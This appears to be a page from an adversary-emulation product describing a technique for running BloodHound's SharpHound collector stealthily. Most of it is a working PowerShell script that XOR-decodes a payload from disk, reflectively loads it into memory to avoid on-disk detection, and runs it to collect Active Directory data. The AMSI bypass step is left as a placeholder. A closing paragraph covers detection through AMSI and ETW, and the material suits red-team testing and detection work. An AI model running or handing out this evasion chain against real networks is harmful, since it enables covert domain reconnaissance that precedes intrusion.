Bypass AMSI, load, and run XOR'd SharpHound payload

BloodHound's collector, SharpHound, uses .NET API calls to pull Active Directory data. This TTP takes an existing XOR'd SharpHound payload on disk, decodes it, and loads and runs the collector in memory so that the decoded assembly is never written to disk. Because .NET submits byte-array assembly loads to the Antimalware Scan Interface (AMSI), the TTP first bypasses AMSI in the current PowerShell process so that the SharpHound assembly can be loaded.
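The following PowerShell is an added example of the decode-and-load part of this technique; it is not the Operator TTP's gated command and not code from BloodHound or SharpHound. The payload path, the XOR key, and the collector arguments are assumptions. The page states that the TTP disables AMSI in the current process but does not show how, so that step is left as a placeholder comment rather than reproduced here.

```powershell
# Added example (not the Operator TTP's command): XOR-decode a SharpHound
# assembly from disk and load it into the current PowerShell process.
# Both values below are assumptions; the page does not disclose them.
$PayloadPath = 'C:\Windows\Temp\sharphound.xor'    # assumption
$XorKey      = [byte[]](0x5A, 0x13, 0xC7, 0x2E)    # assumption: repeating multi-byte key

function Invoke-XorBytes {
    # XOR with a repeating key. The operation is symmetric, so the same
    # function both produces the on-disk payload and recovers the assembly.
    param([byte[]]$Data, [byte[]]$Key)
    $out = [byte[]]::new($Data.Length)
    for ($i = 0; $i -lt $Data.Length; $i++) {
        $out[$i] = $Data[$i] -bxor $Key[$i % $Key.Length]
    }
    return $out
}

# One-time preparation (run wherever the real binary is available):
# [IO.File]::WriteAllBytes($PayloadPath,
#     (Invoke-XorBytes -Data ([IO.File]::ReadAllBytes('.\SharpHound.exe')) -Key $XorKey))

# Step 1: AMSI bypass for this PowerShell process goes here. The page states
# the TTP performs one but does not show it, so none is reproduced. Without
# it, .NET hands the decoded bytes to AMSI in Assembly.Load and a known
# collector is normally blocked.

# Step 2: read the XOR'd payload and recover the assembly bytes in memory.
$encoded  = [IO.File]::ReadAllBytes($PayloadPath)
$asmBytes = Invoke-XorBytes -Data $encoded -Key $XorKey

# Sanity check before loading: a PE image starts with 'MZ' (0x4D 0x5A).
# A wrong key or file yields garbage here instead of a confusing load error.
if ($asmBytes.Length -lt 2 -or $asmBytes[0] -ne 0x4D -or $asmBytes[1] -ne 0x5A) {
    throw "Decoded payload is not a PE image; check the key and path."
}

# Step 3: reflective load from the byte array; nothing decoded touches disk.
$asm = [System.Reflection.Assembly]::Load($asmBytes)

# Step 4: run the collector's entry point with ordinary SharpHound arguments
# (argument values are an assumption for illustration).
$collectorArgs = [string[]]@('-c', 'All', '--outputdirectory', 'C:\Windows\Temp')
$asm.EntryPoint.Invoke($null, [object[]]@(,$collectorArgs))
```

The array is wrapped with `@(,$collectorArgs)` so that `Invoke` receives a single `string[]` parameter rather than spreading the strings across several parameters. From the defender's side, the XOR layer only defeats on-disk signature matching; the in-memory `Assembly.Load` is still visible to AMSI (hence the bypass the TTP needs) and to the .NET runtime's ETW assembly-load events, which is where detection of this chain normally lands.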

Test this TTP

Test this TTP using one of our Operator chains:


Ingress, load, and run the SharpHound collector.